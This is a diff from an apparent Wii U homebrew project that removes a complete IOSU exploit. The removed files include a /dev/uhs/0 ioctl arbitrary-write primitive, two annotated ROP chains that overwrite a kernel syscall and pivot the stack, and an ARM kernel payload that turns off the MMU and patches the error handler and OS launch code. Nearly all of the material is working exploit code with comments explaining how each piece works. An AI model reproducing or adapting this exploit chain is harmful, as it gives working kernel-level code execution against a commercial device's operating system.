0xE5,0x92,0x30,0x54,0xE5,0x9C,0x00,0x00,
};
static const char repairData_usb_root_thread[] = {
0xE5,0x8D,0xE0,0x04,0xE5,0x8D,0xC0,0x08,0xE5,0x8D,0x40,0x0C,0xE5,0x8D,0x60,0x10,
0xEB,0x00,0xB2,0xFD,0xEA,0xFF,0xFF,0xC9,0x10,0x14,0x03,0xF8,0x10,0x62,0x4D,0xD3,
0x10,0x14,0x50,0x00,0x10,0x14,0x50,0x20,0x10,0x14,0x00,0x00,0x10,0x14,0x00,0x90,
0x10,0x14,0x00,0x70,0x10,0x14,0x00,0x98,0x10,0x14,0x00,0x84,0x10,0x14,0x03,0xE8,
0x10,0x14,0x00,0x3C,0x00,0x00,0x01,0x73,0x00,0x00,0x01,0x76,0xE9,0x2D,0x4F,0xF0,
0xE2,0x4D,0xDE,0x17,0xEB,0x00,0xB9,0x92,0xE3,0xA0,0x10,0x00,0xE3,0xA0,0x20,0x03,
0xE5,0x9F,0x0E,0x68,0xEB,0x00,0xB3,0x20,
};
/* from smealum's iosuhax: must be placed at 0x05059938 */
static const char os_launch_hook[] = {
0x47, 0x78, 0x00, 0x00, 0xe9, 0x2d, 0x40, 0x0f, 0xe2, 0x4d, 0xd0, 0x08, 0xeb,
0xff, 0xfd, 0xfd, 0xe3, 0xa0, 0x00, 0x00, 0xeb, 0xff, 0xfe, 0x03, 0xe5, 0x9f,
0x10, 0x4c, 0xe5, 0x9f, 0x20, 0x4c, 0xe3, 0xa0, 0x30, 0x00, 0xe5, 0x8d, 0x30,
0x00, 0xe5, 0x8d, 0x30, 0x04, 0xeb, 0xff, 0xfe, 0xf1, 0xe2, 0x8d, 0xd0, 0x08,
0xe8, 0xbd, 0x80, 0x0f, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, 0x64, 0x63, 0x61,
0x72, 0x64, 0x30, 0x31, 0x00, 0x2f, 0x76, 0x6f, 0x6c, 0x2f, 0x73, 0x64, 0x63,
0x61, 0x72, 0x64, 0x00, 0x00, 0x00, 0x2f, 0x76, 0x6f, 0x6c, 0x2f, 0x73, 0x64,
0x63, 0x61, 0x72, 0x64, 0x00, 0x05, 0x11, 0x60, 0x00, 0x05, 0x0b, 0xe0, 0x00,
0x05, 0x0b, 0xcf, 0xfc, 0x05, 0x05, 0x99, 0x70, 0x05, 0x05, 0x99, 0x7e,
};
static unsigned int __attribute__((noinline)) disable_mmu(void)
{
unsigned int control_register = 0;
asm volatile("MRC p15, 0, %0, c1, c0, 0" : "=r" (control_register));
asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register & 0xFFFFEFFA));
return control_register;
}
static void __attribute__((noinline)) restore_mmu(unsigned int control_register)
{
asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register));
}
int _main()
{
int(*disable_interrupts)() = (int(*)())0x0812E778;
int(*enable_interrupts)(int) = (int(*)(int))0x0812E78C;
void(*invalidate_icache)() = (void(*)())0x0812DCF0;
void(*invalidate_dcache)(unsigned int, unsigned int) = (void(*)())0x08120164;
void(*flush_dcache)(unsigned int, unsigned int) = (void(*)())0x08120160;
char* (*kernel_memcpy)(void*, void*, int) = (char*(*)(void*, void*, int))0x08131D04;
flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache
int level = disable_interrupts();
unsigned int control_register = disable_mmu();
/* Save the request handle so we can reply later */
*(volatile u32*)0x01E10000 = *(volatile u32*)0x1016AD18;
/* Patch kernel_error_handler to BX LR immediately */
*(int*)0x08129A24 = 0xE12FFF1E;
void * pset_fault_behavior = (void*)0x081298BC;
kernel_memcpy(pset_fault_behavior, (void*)repairData_set_fault_behavior, sizeof(repairData_set_fault_behavior));
void * pset_panic_behavior = (void*)0x081296E4;
kernel_memcpy(pset_panic_behavior, (void*)repairData_set_panic_behavior, sizeof(repairData_set_panic_behavior));
void * pusb_root_thread = (void*)0x10100174;
kernel_memcpy(pusb_root_thread, (void*)repairData_usb_root_thread, sizeof(repairData_usb_root_thread));
void * pUserBinSource = (void*)0x01E50000;
void * pUserBinDest = (void*)0x101312D0;
kernel_memcpy(pUserBinDest, (void*)pUserBinSource, sizeof(arm_user_bin));
int i;
for (i = 0; i < 32; i++)
if (i < 31)
((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = ((char*)0x01E70000)[i];
else
((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = (char)0;
*(int*)(0x050282AE - 0x05000000 + 0x081C0000) = 0xF031FB43; // bl launch_os_hook
*(int*)(0x05052C44 - 0x05000000 + 0x081C0000) = 0xE3A00000; // mov r0, #0
*(int*)(0x05052C48 - 0x05000000 + 0x081C0000) = 0xE12FFF1E; // bx lr
*(int*)(0x0500A818 - 0x05000000 + 0x081C0000) = 0x20002000; // mov r0, #0; mov r0, #0
*(int*)(0x040017E0 - 0x04000000 + 0x08280000) = 0xE3A00000;
*(int*)(0x040019C4 - 0x04000000 + 0x08280000) = 0xE3A00000;
*(int*)(0x04001BB0 - 0x04000000 + 0x08280000) = 0xE3A00000;
*(int*)(0x04001D40 - 0x04000000 + 0x08280000) = 0xE3A00000;
for (i = 0; i < sizeof(os_launch_hook); i++)
((char*)(0x05059938 - 0x05000000 + 0x081C0000))[i] = os_launch_hook[i];
*(int*)(0x1555500) = 0;
/* REENABLE MMU */
restore_mmu(control_register);
invalidate_dcache(0x081298BC, 0x4001); // giving a size >= 0x4000 invalidates all cache
invalidate_icache();
enable_interrupts(level);
return 0;
}

View File

@ -1,16 +0,0 @@
#ifndef _TYPES_H
#define _TYPES_H
#include <stdint.h>
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
typedef uint64_t u64;
typedef int8_t s8;
typedef int16_t s16;
typedef int32_t s32;
typedef int64_t s64;
#endif

View File

@ -1,25 +0,0 @@
void* m_memcpy(void *dst, const void *src, unsigned int len)
{
const unsigned char *src_ptr = (const unsigned char *)src;
unsigned char *dst_ptr = (unsigned char *)dst;
while(len)
{
*dst_ptr++ = *src_ptr++;
--len;
}
return dst;
}
void* m_memset(void *dst, int val, unsigned int bytes)
{
unsigned char *dst_ptr = (unsigned char *)dst;
unsigned int i = 0;
while(i < bytes)
{
dst_ptr[i] = val;
++i;
}
return dst;
}

View File

@ -1,7 +0,0 @@
#ifndef _UTILS_H_
#define _UTILS_H_
void* m_memcpy(void *dst, const void *src, unsigned int len);
void* m_memset(void *dst, int val, unsigned int len);
#endif

View File

@ -1,71 +0,0 @@
ifeq ($(strip $(DEVKITARM)),)
$(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
endif
ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
export PATH:=$(DEVKITARM)/bin:$(PATH)
endif
CC = arm-none-eabi-gcc
# LINK = arm-none-eabi-gcc
LINK = arm-none-eabi-ld
AS = arm-none-eabi-as
OBJCOPY = arm-none-eabi-objcopy
CFLAGS += -Wall -mbig-endian -std=gnu99 -march=armv5 -Os -I$(DEVKITPRO)/libnds/include
LDFLAGS += --script=link.ld -EB -L"$(DEVKITARM)/arm-none-eabi/lib" -Map=output.map
CFILES = $(wildcard source/*.c)
BINFILES = $(wildcard data/*.bin)
OFILES = $(BINFILES:data/%.bin=build/%.bin.o)
OFILES += $(CFILES:source/%.c=build/%.o)
DFILES = $(CFILES:source/%.c=build/%.d)
SFILES = $(wildcard source/*.s)
OFILES += $(SFILES:source/%.s=build/%.o)
PROJECTNAME = ${shell basename "$(CURDIR)"}
CWD = "$(CURDIR)""
#---------------------------------------------------------------------------------
# canned command sequence for binary data, taken from devkitARM
#---------------------------------------------------------------------------------
define bin2o
bin2s $< | $(AS) -o $(@)
echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"_end[];" > source/`(echo $(<F) | tr . _)`.h
echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"[];" >> source/`(echo $(<F) | tr . _)`.h
echo "extern const u32" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`_size";" >> source/`(echo $(<F) | tr . _)`.h
endef
.PHONY:=all dirs
all: dirs $(PROJECTNAME).bin $(PROJECTNAME)_bin.h
dirs:
@mkdir -p build
$(PROJECTNAME).bin: $(PROJECTNAME).elf
# $(OBJCOPY) -O binary $< $@
$(OBJCOPY) -j .text -j .rodata -O binary $< $@
$(PROJECTNAME)_bin.h: $(PROJECTNAME).bin
xxd -i $< | sed "s/unsigned/static const unsigned/g;s/$(PROJECTNAME)$*/$(PROJECTNAME)/g" > $@
$(PROJECTNAME).elf: $(OFILES)
$(LINK) $(LDFLAGS) -o $(PROJECTNAME).elf $(filter-out build/crt0.o, $(OFILES))
clean:
@rm -rf build
@rm -f $(PROJECTNAME).elf $(PROJECTNAME).bin $(PROJECTNAME)_bin.h output.map
@echo "all cleaned up !"
-include $(DFILES)
build/%.o: source/%.c
$(CC) $(CFLAGS) -c $< -o $@
@$(CC) -MM $< > build/$*.d
build/%.o: source/%.s
$(CC) $(CFLAGS) -xassembler-with-cpp -c $< -o $@
@$(CC) -MM $< > build/$*.d
build/%.bin.o: data/%.bin
@echo $(notdir $<)
@$(bin2o)

View File

@ -1,18 +0,0 @@
OUTPUT_ARCH(arm)
MEMORY
{
RAMX (rx) : ORIGIN = 0x101312D0, LENGTH = 0x000BF00
}
SECTIONS
{
.text : ALIGN(0x04) {
build/crt0.o(.init)
*(.text)
}
.rodata : {
*(.rodata*)
}
}

View File

@ -1,20 +0,0 @@
.section ".init"
.arm
.align 4
.extern _main
.type _main, %function
.extern memset
.type memset, %function
_start:
b _main
.global IOS_DCFlushAllCache
IOS_DCFlushAllCache:
MOV R15, R0
clean_loop:
MRC p15, 0, r15, c7, c10, 3
BNE clean_loop
MCR p15, 0, R0, c7, c10, 4

View File

@ -1,30 +0,0 @@
#include "types.h"
#include "utils.h"
void _main()
{
void(*ios_shutdown)(int) = (void(*)(int))0x1012EE4C;
int(*reply)(int, int) = (int(*)(int, int))0x1012ED04;
int saved_handle = *(volatile u32*)0x01E10000;
int myret = reply(saved_handle, 0);
if (myret != 0)
ios_shutdown(1);
// stack pointer will be 0x1016AE30
// link register will be 0x1012EACC
asm("LDR SP, newsp\n"
"LDR R0, newr0\n"
"LDR LR, newlr\n"
"LDR PC, newpc\n"
"newsp: .word 0x1016AE30\n"
"newlr: .word 0x1012EACC\n"
"newr0: .word 0x10146080\n"
"newpc: .word 0x10111164\n");
}

View File

@ -1,16 +0,0 @@
#ifndef _TYPES_H
#define _TYPES_H
#include <stdint.h>
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
typedef uint64_t u64;
typedef int8_t s8;
typedef int16_t s16;
typedef int32_t s32;
typedef int64_t s64;
#endif

View File

@ -1,25 +0,0 @@
void* m_memcpy(void *dst, const void *src, unsigned int len)
{
const unsigned char *src_ptr = (const unsigned char *)src;
unsigned char *dst_ptr = (unsigned char *)dst;
while(len)
{
*dst_ptr++ = *src_ptr++;
--len;
}
return dst;
}
void* m_memset(void *dst, int val, unsigned int bytes)
{
unsigned char *dst_ptr = (unsigned char *)dst;
unsigned int i = 0;
while(i < bytes)
{
dst_ptr[i] = val;
++i;
}
return dst;
}

View File

@ -1,7 +0,0 @@
#ifndef _UTILS_H_
#define _UTILS_H_
void* m_memcpy(void *dst, const void *src, unsigned int len);
void* m_memset(void *dst, int val, unsigned int len);
#endif

View File

@ -1,7 +0,0 @@
.extern __main
.globl _start
_start:
# jump to our main
b __main

View File

@ -1,387 +0,0 @@
#include "types.h"
#include "coreinit.h"
#define CHAIN_START 0x1016AD40
#define SHUTDOWN 0x1012EE4C
#define SIMPLE_RETURN 0x101014E4
#define SOURCE 0x01E20000
#define IOS_CREATETHREAD 0x1012EABC
#define ARM_CODE_BASE 0x08134100
#define REPLACE_SYSCALL 0x081298BC
/* YOUR ARM CODE HERE (starts at ARM_CODE_BASE) */
#include "payload/arm_kernel_bin.h"
#include "payload/arm_user_bin.h"
/* ROP CHAIN STARTS HERE (0x1015BD78) */
static const int final_chain[] = {
0x101236f3, // 0x00 POP {R1-R7,PC}
0x0, // 0x04 arg
0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR
0x68, // 0x0C stacksize
0x10101638, // 0x10
0x0, // 0x14
0x0, // 0x18
0x0, // 0x1C
0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
0x0, // 0x24
0x0, // 0x28
0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x30
0x0, // 0x34
IOS_CREATETHREAD, // 0x38
0x1, // 0x3C
0x2, // 0x40
0x10123a9f, // 0x44 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE92D4010, // 0x4C value: PUSH {R4,LR}
0x0, // 0x50
0x10123a8b, // 0x54 POP {R3,R4,PC}
0x1, // 0x58 R3 must be 1 for the arbitrary write
0x0, // 0x5C
0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x64
0x0, // 0x68
0x1012EE64, // 0x6C set_panic_behavior (arbitrary write)
0x0, // 0x70
0x0, // 0x74
0x10123a9f, // 0x78 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A04000, // 0x80 value: MOV R4, R0
0x0, // 0x84
0x10123a8b, // 0x88 POP {R3,R4,PC}
0x1, // 0x8C R3 must be 1 for the arbitrary write
0x0, // 0x90
0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x98
0x0, // 0x9C
0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write)
0x0, // 0xA4
0x0, // 0xA8
0x10123a9f, // 0xAC POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF
0x0, // 0xB8
0x10123a8b, // 0xBC POP {R3,R4,PC}
0x1, // 0xC0 R3 must be 1 for the arbitrary write
0x0, // 0xC4
0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0xCC
0x0, // 0xD0
0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write)
0x0, // 0xD8
0x0, // 0xDC
0x10123a9f, // 0xE0 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0)
0x0, // 0xEC
0x10123a8b, // 0xF0 POP {R3,R4,PC}
0x1, // 0xF4 R3 must be 1 for the arbitrary write
0x0, // 0xF8
0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x100
0x0, // 0x104
0x1012EE64, // 0x108 set_panic_behavior (arbitrary write)
0x0, // 0x10C
0x0, // 0x110
0x10123a9f, // 0x114 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A00004, // 0x11C value: MOV R0, R4
0x0, // 0x120
0x10123a8b, // 0x124 POP {R3,R4,PC}
0x1, // 0x128 R3 must be 1 for the arbitrary write
0x0, // 0x12C
0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x134
0x0, // 0x138
0x1012EE64, // 0x13C set_panic_behavior (arbitrary write)
0x0, // 0x140
0x0, // 0x144
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0x00000000, // 0x150 value: NOP
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0x1AFFFFFD, // 0x150 value: BNE clean_loop
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A03004, // 0x184 value: MOV R3, R4
0x0, // 0x188
0x10123a8b, // 0x18C POP {R3,R4,PC}
0x1, // 0x190 R3 must be 1 for the arbitrary write
0x0, // 0x194
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x19C
0x0, // 0x1A0
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
0x0, // 0x1A8
0x0, // 0x1AC
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE8BD4010, // 0x184 value: POP {R4,LR}
0x0, // 0x188
0x10123a8b, // 0x18C POP {R3,R4,PC}
0x1, // 0x190 R3 must be 1 for the arbitrary write
0x0, // 0x194
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x19C
0x0, // 0x1A0
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
0x0, // 0x1A8
0x0, // 0x1AC
0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE12FFF13, // 0x1B8 value: BX R3 our code :-)
0x0, // 0x1BC
0x10123a8b, // 0x1C0 POP {R3,R4,PC}
0x1, // 0x1C4 R3 must be 1 for the arbitrary write
0x0, // 0x1C8
0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x1D0
0x0, // 0x1D4
0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write)
0x0, // 0x1DC
0x0, // 0x1E0
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64
0x4001, // 0x1E0 on > 0x4000 it flushes all data caches
0x0, // 0x1E0
0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len)
0x0, // 0x1DC
0x0, // 0x1E0
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
ARM_CODE_BASE, // 0x1E8 our code destination address
0x0, // 0x1EC
0x0, // 0x1F0
0x101063db, // 0x1F4 POP {R1,R2,R5,PC}
0x0, // 0x1F8
sizeof(arm_kernel_bin), // 0x1FC our code size
0x0, // 0x200
0x10123983, // 0x204 POP {R1,R3,R4,R6,PC}
0x01E40000, // 0x208 our code source location
0x08131D04, // 0x20C KERNEL_MEMCPY address
0x0, // 0x210
0x0, // 0x214
0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot)
0x0,
0x0,
0x101312D0,
};
static const int second_chain[] = {
0x10123a9f, // 0x00 POP {R0,R1,R4,PC}
CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination
0x0, // 0x08
0x0, // 0x0C
0x101063db, // 0x10 POP {R1,R2,R5,PC}
0x01E30000, // 0x14 source
sizeof(final_chain), // 0x18 length
0x0, // 0x1C
0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
0x0, // 0x24
0x0, // 0x28
0x101236f3, // 0x2C POP {R1-R7,PC}
0x0, // 0x30 arg
0x101001DC, // 0x34 stackptr
0x68, // 0x38 stacksize
0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
0x0, // 0x40
0x0, // 0x44
0x0, // 0x48
0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
0x0, // 0x50
0x0, // 0x54
0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x5C
0x0, // 0x60
IOS_CREATETHREAD, // 0x64
0x1, // 0x68 priority
0x2, // 0x6C flags
0x0, // 0x70
0x0, // 0x74
0x101063db, // 0x78 POP {R1,R2,R5,PC}
0x0, // 0x7C
-(0x240 + 0x18 + 0xF000), // 0x80 stack offset
0x0, // 0x84
0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC}
0x0,
0x0,
0x0,
0x00110000 - 0x44, // 0x8C
0x00110010, // 0x90
0x0, // 0x94
0x0, // 0x98
0x0, // 0x9C
0x0, // 0xA0
0x0, // 0xA4
0x4, // 0xA8 R11 must equal 4 in order to pivot the stack
0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC}
0x0,
0x0,
0x1012EA68, // 0xAC stack pivot
};
static void uhs_exploit_init(unsigned int coreinit_handle);
static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val);
void __main(void)
{
unsigned int coreinit_handle;
OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle);
unsigned int sysapp_handle;
OSDynLoad_Acquire("sysapp.rpl", &sysapp_handle);
int (* OSForceFullRelaunch)(void);
OSDynLoad_FindExport(coreinit_handle, 0, "OSForceFullRelaunch", &OSForceFullRelaunch);
int (*IOS_Open)(char *path, unsigned int mode);
int (*IOS_Close)(int fd);
OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open);
OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close);
void (*OSExitThread)(int);
OSDynLoad_FindExport(coreinit_handle, 0, "OSExitThread", &OSExitThread);
void (*SYSLaunchMenu)(void);
OSDynLoad_FindExport(sysapp_handle, 0, "SYSLaunchMenu", &SYSLaunchMenu);
OSForceFullRelaunch();
SYSLaunchMenu();
int dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0); //! Open /dev/uhs/0 IOS node
uhs_exploit_init(coreinit_handle); //! Init variables for the exploit
//!------ROP CHAIN-------
uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20);
uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x10, 0x1011814C);
uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0xC, SOURCE);
uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START, 0x1012392b); // pop {R4-R6,PC}
IOS_Close(dev_uhs_0_handle);
OSExitThread(0);
}
static void uhs_exploit_init(unsigned int coreinit_handle)
{
void (*DCStoreRange)(const void *addr, uint32_t length);
void (*memcpy)(void *dst, const void *src, uint32_t length);
void (*memset)(void *dst, const char val, uint32_t length);
OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange);
OSDynLoad_FindExport(coreinit_handle, 0, "memcpy", &memcpy);
OSDynLoad_FindExport(coreinit_handle, 0, "memset", &memset);
//! Clear out our used MEM1 area
memset((void*)0xF5E00000, 0, 0x00070000);
DCStoreRange((void*)0xF5E00000, 0x00070000);
//!------Variables used in exploit------
int *pretend_root_hub = (int*)0xF5E60640;
int *ayylmao = (int*)0xF5E00000;
//!-------------------------------------
ayylmao[5] = 1;
ayylmao[8] = 0x1E00000;
memcpy((char*)(0xF5E20000), second_chain, sizeof(second_chain));
memcpy((char*)(0xF5E30000), final_chain, sizeof(final_chain));
memcpy((char*)(0xF5E40000), arm_kernel_bin, sizeof(arm_kernel_bin));
memcpy((char*)(0xF5E50000), arm_user_bin, sizeof(arm_user_bin));
pretend_root_hub[33] = 0x1E00000;
pretend_root_hub[78] = 0;
//! Store current CPU cache into main memory for IOSU to read
DCStoreRange(ayylmao, 0x840);
DCStoreRange((void*)0xF5E20000, sizeof(second_chain));
DCStoreRange((void*)0xF5E30000, sizeof(final_chain));
DCStoreRange((void*)0xF5E40000, sizeof(arm_kernel_bin));
DCStoreRange((void*)0xF5E50000, sizeof(arm_user_bin));
DCStoreRange(pretend_root_hub, 0x160);
}
static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val)
{
void (*DCStoreRange)(const void *addr, uint32_t length);
void (*OSSleepTicks)(uint64_t ticks);
int (*IOS_Ioctl)(int fd, uint32_t request, void *input_buffer,uint32_t input_buffer_len, void *output_buffer, uint32_t output_buffer_len);
OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange);
OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks);
OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl);
//!------Variables used in exploit------
int *ayylmao = (int*)0xF5E00000;
//!-------------------------------------
ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes
DCStoreRange(ayylmao, 0x840); //! Store current CPU cache into main memory for IOSU to read
OSSleepTicks(0x200000); //! Wait for caches to refresh over in IOSU
//! index 0 is at 0x10149A6C, each index is 0x144 bytes long, so 0x10149A6C - (0x144*0xB349B) = 0x1E60640,
//! which is the physical address of 0xF5E60640 for us, right at the end of MEM1
int request_buffer[] = { -(0xB349B), val };
int output_buffer[32];
return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
}

10
dsrom/global.h Normal file
View File

@ -0,0 +1,10 @@
#ifndef _GLOBAL_H_
#define _GLOBAL_H_
#define LAUNCH_SYSMENU 0
#define LAUNCH_HBL 1
#define LAUNCH_MOCHA 2
#define LAUNCH_CFW_IMG 3
#endif

View File

@ -3,8 +3,8 @@
; more useful definitions ; more useful definitions
HBL_LOADER_ADR equ (0x01800000) HBL_LOADER_ADR equ (0x01800000)
IOSU_PATCHER_ADR equ (0x01804000)
SELECTOR_ADDRESS equ (0x01808000) SELECTOR_ADDRESS equ (0x01808000)
CFW_BOOTER_ADR equ (0x0180C000)
NERD_THREAD0OBJECT equ (HAX_TARGET_ADDRESS - 0x1000) NERD_THREAD0OBJECT equ (HAX_TARGET_ADDRESS - 0x1000)
NERD_THREAD2OBJECT equ (HAX_TARGET_ADDRESS - 0x2000) NERD_THREAD2OBJECT equ (HAX_TARGET_ADDRESS - 0x2000)
@ -224,13 +224,13 @@ rop_start:
; memcpy code ; memcpy code
call_func MEMCPY, HBL_LOADER_ADR, hbl_loader, hbl_loader_end - hbl_loader, 0x0 call_func MEMCPY, HBL_LOADER_ADR, hbl_loader, hbl_loader_end - hbl_loader, 0x0
